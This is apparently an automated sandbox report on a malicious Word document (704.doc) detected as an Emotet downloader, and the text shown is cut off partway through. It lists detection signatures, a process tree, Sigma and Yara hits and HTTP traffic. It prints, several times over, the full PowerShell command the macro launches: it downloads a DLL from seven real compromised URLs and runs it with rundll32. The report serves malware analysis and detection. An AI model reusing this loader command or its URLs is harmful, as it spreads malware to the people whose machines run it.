Loading ...

Play interactive tourEdit tour

Windows Analysis Report 704.doc

Overview

General Information

Sample Name:704.doc
Analysis ID:526268
MD5:40f85d07da2533d576b1f2d7c043a2da
SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Yara detected Emotet Downloader
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6924 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • cmd.exe (PID: 4128 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6312 cmdline: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • rundll32.exe (PID: 1376 cmdline: "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0x9be4:$s1: \Common Files\Microsoft Shared\
  • 0x9f3c:$s1: \Common Files\Microsoft Shared\
  • 0x41e1:$s2: Scripting.FileSystemObject
  • 0x5318:$a1: Document_Open
  • 0x9203:$a1: Document_Open
  • 0xa612:$a1: Document_Open
  • 0xba62:$a1: Document_Open
C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6924, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 4128
    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6924, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 4128
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4128, ProcessCommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebReques
    Sigma detected: T1086 PowerShell ExecutionShow sources
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132820573608402300.6312.DefaultAppDomain.powershell

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://ckfoods.net/wp-admin/wPInm2rgMu/Avira URL Cloud: Label: malware
    Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/Avira URL Cloud: Label: malware
    Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/Avira URL Cloud: Label: malware
    Machine Learning detection for sampleShow sources
    Source: 704.docJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
    Source: global trafficDNS query: name: primtalent.com
    Source: global trafficTCP traffic: 192.168.2.4:49754 -> 148.72.96.3:80
    Source: global trafficTCP traffic: 192.168.2.4:49754 -> 148.72.96.3:80
    Source: winword.exeMemory has grown: Private usage: 0MB later: 76MB
    Source: Joe Sandbox ViewASN Name: HINETDataCommunicationBusinessGroupTW HINETDataCommunicationBusinessGroupTW
    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
    Source: global trafficHTTP traffic detected: GET /wp-admin/9yt1u/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: primtalent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /wordpress/6f0qIQlWPaYDfa/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Nov 2021 12:23:07 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found